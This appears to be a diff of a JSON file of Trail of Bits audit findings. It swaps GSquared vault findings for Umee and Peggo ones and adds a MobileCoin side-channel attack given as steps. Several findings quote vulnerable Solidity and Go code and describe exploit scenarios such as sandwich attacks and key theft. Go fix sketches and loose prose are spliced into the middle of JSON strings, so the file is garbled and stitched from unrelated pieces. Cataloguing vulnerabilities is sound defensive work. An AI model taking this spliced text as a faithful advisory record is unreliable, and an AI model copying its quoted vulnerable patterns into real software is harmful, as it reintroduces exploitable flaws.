Suppose B is a recently minted block whose total number of fee outputs is equal to the number of tokens, which is less than the number of transactions in B. Further suppose that Mallory wishes to determine whether B contains a transaction involving T. Mallory does the following: 1. She puts her node into its state just prior to the minting of B. 2. She mints to herself a quantity of T worth u64::MAX / min_fee * min_fee. Call this quantity F. 3. She submits to her node a transaction with a fee of F. 4. She allows the block to be minted. 5. She observes the number of fee outputs in the modified block, B′: a. If B does not contain a transaction involving T, then B contains a fee output for T equal to zero, and B′ contains a fee output for T equal to F. b. If B does contain a transaction involving T, then B contains a fee output for T equal to at least min_fee, and B′ contains two fee outputs for T, one of which is equal to u64::MAX.
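For finding 21's short-term recommendation, a minimal Go sketch of tracking uToken supply in the leverage module's own state (an sdk.Int per denom) so that IBC transfers and direct bank sends cannot move it. The SupplyKeeper type and its in-memory map are illustrative stand-ins for a KVStore-backed keeper, not Umee's actual API.

```go
package keeper

import sdk "github.com/cosmos/cosmos-sdk/types"

// SupplyKeeper records uToken supply independently of x/bank balances.
type SupplyKeeper struct {
	supply map[string]sdk.Int // stand-in for a KVStore keyed by uToken denom
}

func NewSupplyKeeper() SupplyKeeper {
	return SupplyKeeper{supply: make(map[string]sdk.Int)}
}

// OnMint and OnBurn are the only two places the recorded supply changes.
func (k SupplyKeeper) OnMint(denom string, amt sdk.Int) {
	k.supply[denom] = k.total(denom).Add(amt)
}

func (k SupplyKeeper) OnBurn(denom string, amt sdk.Int) {
	k.supply[denom] = k.total(denom).Sub(amt)
}

// TotalUTokenSupply no longer consults x/bank, so tokens locked by IBC
// transfers do not distort the token/uToken exchange rate.
func (k SupplyKeeper) TotalUTokenSupply(denom string) sdk.Coin {
	return sdk.NewCoin(denom, k.total(denom))
}

func (k SupplyKeeper) total(denom string) sdk.Int {
	if v, ok := k.supply[denom]; ok {
		return v
	}
	return sdk.ZeroInt()
}
```

The design point is that the exchange rate's denominator is derived from state the module alone controls, which restores the invariant the specification claims.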
Thus, by observing the number of outputs in B′, Mallory can determine whether B contains a transaction involving T. Recommendations Short term, require the total supply of all incorporated tokens not to exceed a u64 value. Doing so will eliminate the possibility of overflow and prevent the attack described above. Long term, consider incorporating randomness into the number of fee outputs generated. This could provide an alternative means of preventing the attack in a way that still allows for overflow. Alternatively, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "title": "22. Collateral dust prevents the designation of defaulted loans as bad debt ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "An account's debt is considered bad debt only if its collateral balance drops to zero. The debt is then repaid from the module's reserves. However, users may liquidate the majority of an account's assets but leave a small amount of debt unpaid. In that case, the transaction fees may make liquidation of the remaining collateral unprofitable. As a result, the bad debt will not be paid from the module's reserves and will linger in the system indefinitely. Exploit Scenario A large loan taken out by a user becomes highly undercollateralized. An attacker liquidates most of the user's collateral to repay the loan but leaves a very small amount of the collateral unliquidated. As a result, the loan is not considered bad debt and is not paid from the reserves. The rest of the tokens borrowed by the user remain out of circulation, preventing other users from withdrawing their funds. Recommendations Short term, establish a lower limit on the amount of collateral that must be liquidated in one transaction to prevent accounts from holding dust collateral. Long term, establish a lower limit on the number of tokens to be used in every system operation. That way, even if the system's economic incentives are lacking, the operations will not result in dust tokens.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "1. Unbounded loop can cause denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Under certain conditions, the withdrawal code will loop, permanently blocking users from getting their funds. The beforeWithdraw function runs before any withdrawal to ensure that the vault has sufficient assets. If the vault reserves are insufficient to cover the withdrawal, it loops over each strategy, incrementing the _strategyId pointer value with each iteration, and withdrawing assets to cover the withdrawal amount.
function beforeWithdraw(uint256 _assets, ERC20 _token) internal returns (uint256) { // If reserves dont cover the withdrawal, start withdrawing from strategies if (_assets > _token.balanceOf(address(this))) { uint48 _strategyId = strategyQueue.head; while (true) { address _strategy = nodes[_strategyId].strategy; uint256 vaultBalance = _token.balanceOf(address(this)); // break if we have withdrawn all we need if (_assets <= vaultBalance) break; uint256 amountNeeded = _assets - vaultBalance; StrategyParams storage _strategyData = strategies[_strategy]; amountNeeded = Math.min(amountNeeded, _strategyData.totalDebt); // If nothing is needed or strategy has no assets, continue if (amountNeeded == 0) { continue; } Figure 1.1: The beforeWithdraw function in GVault.sol#L643-662 However, during an iteration, if the vault raises enough assets that the amount needed by the vault becomes zero or that the current strategy no longer has assets, the loop would keep using the same strategyId until the transaction runs out of gas and fails, blocking the withdrawal. Exploit Scenario Alice tries to withdraw funds from the protocol. The contract may be in a state that sets the conditions for the internal loop to run indefinitely, resulting in the waste of all sent gas, the failure of the transaction, and blocking all withdrawal requests. Recommendations Short term, add logic to increment the _strategyId variable to point to the next strategy in the StrategyQueue before the continue statement. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "title": "23. Users can borrow assets that they are actively using as collateral ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "When a user calls the BorrowAsset function to take out a loan, the function does not check whether the user is borrowing the same type of asset as the collateral he or she supplied. In other words, a user can borrow tokens from the collateral that the user supplied. The Umee system prohibits users from borrowing assets worth more than the collateral they have provided, so a user cannot directly exploit this issue to borrow more funds than the user should be able to borrow. However, a user can borrow the vast majority of his or her collateral to continue accumulating lending rewards while largely avoiding the risks of providing collateral. Exploit Scenario An attacker provides 10 ATOMs to the protocol as collateral and then immediately borrows 9 ATOMs. He continues to earn lending rewards on his collateral but retains the use of most of the collateral. The attacker, through flash loans, could also resupply the borrowed amount as collateral and then immediately take out another loan, repeating the process until the amount he had borrowed asymptotically approached the amount of liquidity he had provided. Recommendations Short term, determine whether borrowers' ability to borrow their own collateral is an issue. (Note that Compound's front end disallows such operations, but its actual contracts do not.) If it is, have BorrowAsset check whether a user is attempting to borrow the same asset that he or she staked as collateral and block the operation if so. Alternatively, ensure that borrow fees are greater than profits from lending.
Long term, assess whether the liquidity-mining incentives accomplish their intended purpose, and ensure that the lending incentives and borrowing costs work well together.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: Low" ] }, { - "title": "2. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The setOwner() function is used to change the owner of the PnLFixedRate contract. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function setOwner(address _owner) external { if (msg.sender != owner) revert PnLErrors.NotOwner(); address previous_owner = msg.sender; owner = _owner; emit LogOwnershipTransferred(previous_owner, _owner); } Figure 2.1: contracts/pnl/PnLFixedRate:56-62 This issue can also be found in the following locations: contracts/pnl/PnL.sol:36-42 contracts/strategy/ConvexStrategy.sol:447-453 contracts/strategy/keeper/GStrategyGuard.sol:92-97 contracts/strategy/stop-loss/StopLossLogic.sol:73-78 Exploit Scenario The owner of the PnLFixedRate contract is a governance-controlled multisignature wallet. The community agrees to change the owner of the strategy, but the wrong address is mistakenly provided to its call to setOwner, permanently misconfiguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, review how critical operations are implemented across the codebase to make sure they are not error-prone.", + "title": "24. Providing additional collateral may be detrimental to borrowers in default ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "When a user who is in default on a loan deposits additional collateral, the collateral will be immediately liquidatable. This may be surprising to users and may affect their satisfaction with the system. Exploit Scenario A user funds a loan and plans to use the coins he deposited as the collateral on a new loan. However, the user does not realize that he defaulted on a previous loan. As a result, bots instantly liquidate the new collateral he provided. Recommendations Short term, if a user is in default on a loan, consider blocking the user from calling the LendAsset or SetCollateralSetting function with an amount of collateral insufficient to collateralize the defaulted position. Alternatively, document the risks associated with calling these functions when a user has defaulted on a loan. Long term, ensure that users cannot incur unexpected financial damage, or document the financial risks that users face.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2712,19 +5460,19 @@ ] }, { - "title": "3. Non-zero token balances in the GRouter can be stolen ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "A non-zero balance of 3CRV, DAI, USDC, or USDT in the router contract can be stolen by an attacker. The GRouter contract is the entrypoint for deposits into a tranche and withdrawals out of a tranche.
A deposit involves depositing a given amount of a supported stablecoin (USDC, DAI, or USDT); converting the deposit, through a series of operations, into G3CRV, the protocol's ERC4626-compatible vault token; and depositing the G3CRV into a tranche. Similarly, for withdrawals, the user burns their G3CRV that was in the tranche and, after a series of operations, receives back some amount of a supported stablecoin (figure 3.1). function withdrawFromTrancheForCaller(uint256 _amount, uint256 _token_index, bool _tranche, uint256 _minAmount) internal returns (uint256 amount) { ERC20(address(tranche.getTrancheToken(_tranche))).safeTransferFrom(msg.sender, address(this), _amount); // withdraw from tranche // index is zero for ETH mainnet as their is just one yield token // returns usd value of withdrawal (uint256 vaultTokenBalance, ) = tranche.withdraw(_amount, 0, _tranche, address(this)); // withdraw underlying from GVault uint256 underlying = vaultToken.redeem(vaultTokenBalance, address(this), address(this)); // remove liquidity from 3crv to get desired stable from curve threePool.remove_liquidity_one_coin(underlying, int128(uint128(_token_index)), //value should always be 0,1,2 0); ERC20 stableToken = ERC20(routerOracle.getToken(_token_index)); amount = stableToken.balanceOf(address(this)); if (amount < _minAmount) { revert Errors.LTMinAmountExpected(); } // send stable to user stableToken.safeTransfer(msg.sender, amount); emit LogWithdrawal(msg.sender, _amount, _token_index, _tranche, amount); } Figure 3.1: The withdrawFromTrancheForCaller function in GRouter.sol#L421-468 However, notice that during withdrawals the amount of stableToken that will be transferred back to the user is a function of the current stableToken balance of the contract (see the amount = stableToken.balanceOf(address(this)) line in figure 3.1). In the expected case, the balance should be only the tokens received from the threePool.remove_liquidity_one_coin swap (figure 3.1). However, a non-zero balance could also occur if a user airdrops some tokens or they transfer tokens by mistake instead of calling the expected deposit or withdraw functions. As long as the attacker has at least 1 wei of G3CRV to burn, they are capable of withdrawing the whole balance of stableToken from the contract, regardless of how much was received as part of the threePool swap. A similar situation can happen with deposits. A non-zero balance of G3CRV can be stolen as long as the attacker has at least 1 wei of either DAI, USDC, or USDT. Exploit Scenario Alice mistakenly sends a large amount of DAI to the GRouter contract instead of calling the deposit function. Eve notices that the GRouter contract has a non-zero balance of DAI and calls withdraw with a negligible balance of G3CRV. Eve is able to steal Alice's DAI at a very small cost. Recommendations Short term, consider using the difference between the contract's pre- and post-balance of stableToken for withdrawals, and depositAmount for deposits, in order to ensure that only the newly received tokens are used for the operations. Long term, create an external skim function that can be used to skim any excess tokens in the contract.
Additionally, ensure that the user documentation highlights that users should not transfer tokens directly to the GRouter and should instead use the web interface or call the deposit and withdraw functions. Finally, ensure that token airdrops or unexpected transfers can only benefit the protocol.", + "title": "25. Insecure storage of price-feeder keyring passwords ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Users can store oracle keyring passwords in the price-feeder configuration file. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the configuration file has overly broad permissions (like those shown in figure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (figure 25.2), which is a safer approach. Moreover, neither source provides information on different keyring back ends, and the example price-feeder configuration uses the \"test\" back end. An attacker with access to the configuration file on a user's system, or to a backup of the configuration file, could steal the user's keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwxrwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with address A4F324A31DECC0172A83E57A3625AF4B89A91F1F not found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the configuration file used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder configuration file, which has been misconfigured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the configuration file. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it finds that a private key file has overly broad permissions. Document the risks associated with storing a keyring password in the configuration file. Improve the price-feeder's keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about different keyring back ends and the addition of keyring entries, among other concepts.
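For finding 25's recommended permission check, a minimal Go sketch: refuse to start (or at least warn) when the configuration file holding a keyring password is readable by group or others, similar to openssh's private key check. The hard-failure policy in main is an illustrative choice.

```go
package main

import (
	"fmt"
	"log"
	"os"
)

// checkConfigPerms returns an error if the file is accessible to anyone
// other than its owner (any group/other permission bits set).
func checkConfigPerms(path string) error {
	info, err := os.Stat(path)
	if err != nil {
		return err
	}
	if perm := info.Mode().Perm(); perm&0o077 != 0 {
		return fmt.Errorf("config file %s has overly broad permissions %#o; expected 0600", path, perm)
	}
	return nil
}

func main() {
	if err := checkConfigPerms("price-feeder.example.toml"); err != nil {
		log.Fatal(err) // assumed policy: hard failure, as openssh does for key files
	}
}
```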
26. Insufficient validation of genesis parameters Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-UMEE-26 Target: Genesis parameters", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "4. Uninformative implementation of maxDeposit and maxMint from EIP-4626 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The GVault implementation of EIP-4626 is uninformative for maxDeposit and maxMint, as they return only fixed, extreme values. EIP-4626 is a standard to implement tokenized vaults. In particular, the following is specified: maxDeposit: MUST factor in both global and user-specific limits, like if deposits are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. maxMint: MUST factor in both global and user-specific limits, like if mints are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. The current implementation of maxDeposit and maxMint in the GVault contract directly return the maximum value of the uint256 type: /// @notice The maximum amount a user can deposit into the vault function maxDeposit(address) public pure override returns (uint256 maxAssets) { return type(uint256).max; } . . . /// @notice maximum number of shares that can be minted function maxMint(address) public pure override returns (uint256 maxShares) { return type(uint256).max; } Figure 4.1: The maxDeposit and maxMint functions from GVault.sol This implementation, however, does not provide any valuable information to the user and may lead to faulty integrations with third-party systems. Exploit Scenario A third-party protocol wants to deposit into a GVault. It first calls maxDeposit to know the maximum amount of assets it can deposit and then calls deposit. However, the latter function call will revert because the value is too large. Recommendations Short term, return suitable values in maxDeposit and maxMint by considering the amount of assets owned by the caller as well as any other global condition (e.g., a contract is paused). Long term, ensure compliance with the EIP specification that is being implemented (in this case, EIP-4626).", + "title": "27. Potential overflows in Peggo's current block calculations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In a few code paths, Peggo calculates a delayed block number by subtracting a delay value from the latest block number. This subtraction will result in an overflow and cause Peggo to operate incorrectly if it is run against a blockchain node whose latest block number is less than the delay value. We set the severity of this finding to informational because the issue is unlikely to occur in practice; moreover, it is easy to have Peggo wait to perform the calculation until the latest block number is one that will not cause an overflow.
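A minimal Go sketch of the wait-until-safe guard just described for finding 27: only compute the delayed block number once the chain height exceeds the confirmation delay, returning ok=false (so the caller can wait and retry) instead of letting the unsigned subtraction wrap.

```go
package main

import "fmt"

// delayedBlock returns latest-delay, or ok=false when the chain has not yet
// produced enough blocks for the subtraction to be meaningful.
func delayedBlock(latest, delay uint64) (uint64, bool) {
	if latest < delay {
		return 0, false // too early: subtracting would wrap around
	}
	return latest - delay, true
}

func main() {
	if current, ok := delayedBlock(5, 96); !ok {
		fmt.Println("chain not past the confirmation delay yet; retrying later")
	} else {
		fmt.Println("current block:", current)
	}
}
```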
An overflow may occur in the following methods: gravityOrchestrator.GetLastCheckedBlock (figure 27.1) gravityOrchestrator.CheckForEvents gravityOrchestrator.EthOracleMainLoop gravityRelayer.FindLatestValset // add delay to ensure minimum confirmations are received and block is finalized currentBlock := latestHeader.Number.Uint64() - ethBlockConfirmationDelay Figure 27.1: peggo/orchestrator/oracle_resync.go#L35-L42 Recommendations Short term, have Peggo wait to calculate the current block number until the blockchain for which Peggo was configured reaches a block number that will not cause an overflow.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2732,29 +5480,29 @@ ] }, { - "title": "5. moveStrategy runs out of gas for large inputs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Reordering strategies can trigger operations that will run out of gas before completion. A GVault contract allows different strategies to be added into a queue. Since their order is important, the contract provides moveStrategy, a function that lets the owner move a strategy to a certain position in the queue. /// @notice Move the strategy to a new position /// @param _strategy Target strategy to move /// @param _pos desired position of strategy /// @dev if the _pos value is >= number of strategies in the queue, /// the strategy will be moved to the tail position function moveStrategy(address _strategy, uint256 _pos) external onlyOwner { uint256 currentPos = getStrategyPositions(_strategy); uint256 _strategyId = strategyId[_strategy]; if (currentPos > _pos) move(uint48(_strategyId), uint48(currentPos - _pos), false); else move(uint48(_strategyId), uint48(_pos - currentPos), true); } Figure 5.1: The moveStrategy function from GVault.sol The documentation states that if the position to move a certain strategy is larger than the number of strategies in the queue, then it will be moved to the tail of the queue. This is implemented using the move function: /// @notice move a strategy to a new position in the queue /// @param _id id of strategy to move /// @param _steps number of steps to move the strategy /// @param _back move towards tail (true) or head (false) /// @dev Moves a strategy a given number of steps. If the number /// of steps exceeds the position of the head/tail, the /// strategy will take the place of the current head/tail function move(uint48 _id, uint48 _steps, bool _back) internal { Strategy storage oldPos = nodes[_id]; if (_steps == 0) return; if (oldPos.strategy == ZERO_ADDRESS) revert NoIdEntry(_id); uint48 _newPos = !_back ? oldPos.prev : oldPos.next; for (uint256 i = 1; i < _steps; i++) { _newPos = !_back ? nodes[_newPos].prev : nodes[_newPos].next; } Figure 5.2: The header of the move function from StrategyQueue.sol However, if a large number of steps is used, the loop will never finish without running out of gas. A similar issue affects StrategyQueue.withdrawalQueue, if called directly. Exploit Scenario Alice creates a smart contract that acts as the owner of a GVault. She includes code to reorder strategies using a call to moveStrategy. Since she wants to ensure that a certain strategy is always moved to the end of the queue, she uses a very large value as the position. When the code runs, it will always run out of gas, blocking the operation.
Recommendations Short term, ensure that the execution of move ends in a number of steps that is bounded by the number of strategies in the queue. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "title": "28. Peggo does not validate Ethereum address formats ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In several code paths in the Peggo codebase, the go-ethereum HexToAddress function (figure 28.1) is used to parse Ethereum addresses. This function does not return an error when the format of the address passed to it is incorrect. The HexToAddress function is used in tests as well as in the following parts of the codebase: peggo/cmd/peggo/bridge.go#L143 (in the peggo deploy-gravity command, to parse addresses fetched from gravityQueryClient ) peggo/cmd/peggo/bridge.go#L403 (in parsing of the peggo send-to-cosmos command's token-address argument) peggo/cmd/peggo/orchestrator.go#L150 (in the peggo orchestrator [gravity-addr] command) peggo/cmd/peggo/bridge.go#L536 and twice in #L545-L555 peggo/cmd/peggo/keys.go#L199, #L274, and #L299 peggo/orchestrator/ethereum/gravity/message_signatures.go#L36, #L40, #L102, and #L117 peggo/orchestrator/ethereum/gravity/submit_batch.go#L53, #L72, #L94, #L136, and #L144 peggo/orchestrator/ethereum/gravity/valset_update.go#L37, #L55, and #L87 peggo/orchestrator/main_loops.go#L307 peggo/orchestrator/relayer/batch_relaying.go#L81-L82, #L237, and #L250 We set the severity of this finding to undetermined because time constraints prevented us from verifying the impact of the issue. However, without additional validation of the addresses fetched from external sources, Peggo may operate on an incorrect Ethereum address. // HexToAddress returns Address with byte values of s. // If s is larger than len(h), s will be cropped from the left. func HexToAddress( s string ) Address { return BytesToAddress( FromHex(s) ) } // FromHex returns the bytes represented by the hexadecimal string s. // s may be prefixed with \"0x\". func FromHex(s string ) [] byte { if has0xPrefix(s) { s = s[ 2 :] } if len (s)% 2 == 1 { s = \"0\" + s } return Hex2Bytes(s) } // Hex2Bytes returns the bytes represented by the hexadecimal string str. func Hex2Bytes(str string ) [] byte { h, _ := hex.DecodeString(str) return h } Figure 28.1: The HexToAddress function, which calls the BytesToAddress, FromHex, and Hex2Bytes functions, ignores any errors that occur during hex-decoding. Recommendations Short term, review the code paths that use the HexToAddress function, and use a function like ValidateEthAddress to validate Ethereum address string formats before calls to HexToAddress. Long term, add tests to ensure that all code paths that use the HexToAddress function properly validate Ethereum address strings before parsing them.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "6. GVault withdrawals from ConvexStrategy are vulnerable to sandwich attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Token swaps that may be executed during vault withdrawals are vulnerable to sandwich attacks. Note that this is applicable only if a user withdraws directly from the GVault, not through the GRouter contract. The ConvexStrategy contract performs token swaps through Uniswap V2, Uniswap V3, and Curve.
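For finding 28, a minimal Go sketch of the recommended validation: check the string with go-ethereum's common.IsHexAddress before calling HexToAddress, so malformed input is rejected instead of being silently cropped or zero-padded. The parseEthAddress wrapper name is illustrative.

```go
package main

import (
	"fmt"

	"github.com/ethereum/go-ethereum/common"
)

// parseEthAddress rejects strings that are not well-formed 20-byte hex
// addresses before handing them to the lenient HexToAddress.
func parseEthAddress(s string) (common.Address, error) {
	if !common.IsHexAddress(s) {
		return common.Address{}, fmt.Errorf("invalid Ethereum address: %q", s)
	}
	return common.HexToAddress(s), nil
}

func main() {
	if _, err := parseEthAddress("0x1234"); err != nil {
		fmt.Println(err) // too short: rejected instead of silently padded
	}
}
```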
All platforms allow the caller to specify the minimum-amount-out value, which indicates the minimum amount of tokens that a user wishes to receive from a swap. This provides protection against illiquid pools and sandwich attacks. Many of the swaps that the ConvexStrategy contract performs have the minimum-amount-out value hardcoded to zero. But a majority of these swaps can be triggered only by a Gelato keeper, which uses a private channel to relay all transactions. Thus, these swaps cannot be sandwiched. However, this is not the case with the ConvexStrategy.withdraw function. The withdraw function will be called by the GVault contract if the GVault does not have enough tokens for a user withdrawal. If the balance is not sufficient, ConvexStrategy.withdraw will be called to retrieve additional assets to complete the withdrawal request. Note that the transaction to withdraw assets from the protocol will be visible in the public mempool (figure 6.1). function withdraw(uint256 _amount) external returns (uint256 withdrawnAssets, uint256 loss) { if (msg.sender != address(VAULT)) revert StrategyErrors.NotVault(); (uint256 assets, uint256 balance, ) = _estimatedTotalAssets(false); // not enough assets to withdraw if (_amount >= assets) { balance += sellAllRewards(); balance += divestAll(false); if (_amount > balance) { loss = _amount - balance; withdrawnAssets = balance; } else { withdrawnAssets = _amount; } } else { // check if there is a loss, and distribute it proportionally // if it exists uint256 debt = VAULT.getStrategyDebt(); if (debt > assets) { loss = ((debt - assets) * _amount) / debt; _amount = _amount - loss; } if (_amount <= balance) { withdrawnAssets = _amount; } else { withdrawnAssets = divest(_amount - balance, false) + balance; if (withdrawnAssets < _amount) { loss += _amount - withdrawnAssets; } else { if (loss > withdrawnAssets - _amount) { loss -= withdrawnAssets - _amount; } else { loss = 0; } } } } ASSET.transfer(msg.sender, withdrawnAssets); return (withdrawnAssets, loss); } Figure 6.1: The withdraw function in ConvexStrategy.sol#L771-812 In the situation where the _amount that needs to be withdrawn is more than or equal to the total number of assets held by the contract, the withdraw function will call sellAllRewards and divestAll with _slippage set to false (see figure 6.1). The sellAllRewards function, which will call _sellRewards, sells all the additional reward tokens provided by Convex, its balance of CRV, and its balance of CVX for WETH. All these swaps have a hardcoded value of zero for the minimum-amount-out. Similarly, if _slippage is set to false when calling divestAll, the swap specifies a minimum-amount-out of zero. By specifying zero for all these token swaps, there is no guarantee that the protocol will receive any tokens back from the trade. For example, if one or more of these swaps get sandwiched during a call to withdraw, there is an increased risk of reporting a loss that will directly affect the amount the user is able to withdraw. Exploit Scenario Alice makes a call to withdraw to remove some of her funds from the protocol. Eve notices this call in the public transaction mempool.
Knowing that the contract will have to sell some of its rewards, Eve identifies a pure profit opportunity and sandwiches one or more of the swaps performed during the transaction. The strategy now has to report a loss, which results in Alice receiving less than she would have otherwise. Recommendations Short term, for _sellRewards, use the same minAmount calculation as in divestAll but replace debt with the contract's balance of a given reward token. This can be applied for all swaps performed in _sellRewards. For divestAll, set _slippage to true instead of false when it is called in withdraw. Long term, document all cases in which front-running may be possible and its implications for the codebase. Additionally, ensure that all users are aware of the risks of front-running and arbitrage when interacting with the GSquared system.", + "title": "29. Peggo takes an Ethereum private key as a command-line argument ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Certain Peggo commands take an Ethereum private key ( --eth-pk ) as a command-line argument. If an attacker gained access to a user account on a system running Peggo, the attacker would also gain access to any Ethereum private key passed through the command line. The attacker could then use the key to steal funds from the Ethereum account. $ peggo orchestrator {gravityAddress} \\ --eth-pk=$ETH_PK \\ --eth-rpc=$ETH_RPC \\ --relay-batches=true \\ --relay-valsets=true \\ --cosmos-chain-id=... \\ --cosmos-grpc=\"tcp://...\" \\ --tendermint-rpc=\"http://...\" \\ --cosmos-keyring=... \\ --cosmos-keyring-dir=... \\ --cosmos-from=... Figure 29.1: An example of a Peggo command line In Linux, all users can inspect other users' commands and their arguments. A user can enable the proc filesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specified group. However, in many Linux distributions, those options are not enabled by default. Exploit Scenario An attacker gains access to an unprivileged user account on a system running the Peggo orchestrator. The attacker then uses a tool such as pspy to inspect processes run on the system. When a user or script launches the Peggo orchestrator, the attacker steals the Ethereum private key passed to the orchestrator. Recommendations Short term, avoid using a command-line argument to pass an Ethereum private key to the Peggo program. Instead, fetch the private key from the keyring.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "7. Stop loss primer cannot be deactivated ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The stop loss primer cannot be deactivated because the keeper contract uses the incorrect function to check whether or not the meta pool has become healthy again. The stop loss primer is activated if the meta pool that is being used for yield becomes unhealthy. A meta pool is unhealthy if the price of the 3CRV token deviates from the expected price for a set amount of time. The primer can also be deactivated if, after it has been activated, the price of the token stabilizes back to a healthy value. Deactivating the primer is a critical feature because if the pool becomes healthy again, there is no reason to divest all of the strategy's funds, take potential losses, and start all over again.
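For finding 29, a minimal Go sketch of the safer alternatives: read the private key from an environment variable or from standard input rather than from a command-line argument visible through /proc/<pid>/cmdline. The PEGGO_ETH_PK variable name is hypothetical; note that a process's environment, unlike its command line, is readable only by the process owner and root.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// readPrivateKey prefers an environment variable and falls back to stdin;
// neither channel appears in world-readable process command lines.
func readPrivateKey() (string, error) {
	if pk := os.Getenv("PEGGO_ETH_PK"); pk != "" { // hypothetical variable name
		return pk, nil
	}
	fmt.Fprint(os.Stderr, "Enter Ethereum private key: ")
	line, err := bufio.NewReader(os.Stdin).ReadString('\n')
	if err != nil {
		return "", err
	}
	return strings.TrimSpace(line), nil
}

func main() {
	if _, err := readPrivateKey(); err != nil {
		fmt.Fprintln(os.Stderr, "no key provided:", err)
		os.Exit(1)
	}
}
```

The finding's own recommendation, fetching the key from the system keyring, is stronger still; this sketch only shows how to retire the --eth-pk flag without one.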
The GStrategyResolver contract, which is called by a Gelato keeper, will check to identify whether a primer can be deactivated. This is done via the taskStopStopLossPrimer function. The function will attempt to call the GStrategyGuard.endStopLoss function to see whether the primer can be deactivated (figure 7.1). function taskStopStopLossPrimer() external view returns (bool canExec, bytes memory execPayload) { IGStrategyGuard executor = IGStrategyGuard(stopLossExecutor); if (executor.endStopLoss()) { canExec = true; execPayload = abi.encodeWithSelector( executor.stopStopLossPrimer.selector ); } } Figure 7.1: The taskStopStopLossPrimer function in GStrategyResolver.sol#L46-58 However, the GStrategyGuard contract does not have an endStopLoss function. Instead, it has a canEndStopLoss function. Note that the executor variable in taskStopStopLossPrimer is expected to implement the IGStrategyGuard interface, which does have an endStopLoss function. However, the GStrategyGuard contract implements the IGuard interface, which does not have the endStopLoss function. Thus, the call to endStopLoss will simply return, which is equivalent to returning false, and the primer will not be deactivated. Exploit Scenario Due to market conditions, the price of the 3CRV token drops significantly for an extended period of time. This triggers the Gelato keeper to activate the stop loss primer. Soon after, the price of the 3CRV token restabilizes. However, because of the incorrect function call in the taskStopStopLossPrimer function, the primer cannot be deactivated, the stop loss process completes, and all the funds in the strategy must be divested. Recommendations Short term, change the function call from endStopLoss to canEndStopLoss in taskStopStopLossPrimer. Long term, ensure that there are no near-duplicate interfaces for a given contract in the protocol that may lead to an edge case similar to this. Additionally, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "30. Peggo allows the use of non-local unencrypted URL schemes 